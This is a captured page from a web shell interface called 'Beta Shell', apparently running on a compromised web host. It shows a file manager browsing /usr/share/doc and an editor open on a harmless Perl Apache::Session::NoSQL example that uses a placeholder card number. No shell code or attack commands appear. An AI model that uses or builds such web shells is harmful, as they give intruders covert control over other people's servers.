Beta Shell
v2.0 ยท web2.us.cloudlogin.co
[FM]
[CMD]
[PHP]
[DB]
[INFO]
[SEC]
File Manager
~
/
usr
/
share
/
doc
/
perl-Apache-Session-NoSQL
/
examples
Upload
3 items
Name
Size
Perms
Modified
Actions
[ .. / .. ]
simple.pl
405 B
-rw-r--r--
2015-07-22 14:54:03
Edit
Del
Editing: simple.pl
(405 B)
Path: /usr/share/doc/perl-Apache-Session-NoSQL/examples/simple.pl
Back
use Apache::Session::NoSQL; my %session1; tie %session1, 'Apache::Session::NoSQL', undef, { Driver => 'Cassandra', Hostname => 'localhost', }; $session1{visa_number} = "1234 5678 9876 5432"; my $id = $session1{_session_id}; untie %session1; my %session2; tie %session2, 'Apache::Session::NoSQL', $id, { Driver => 'Cassandra', Hostname => 'localhost', }; tied(%session2)->delete;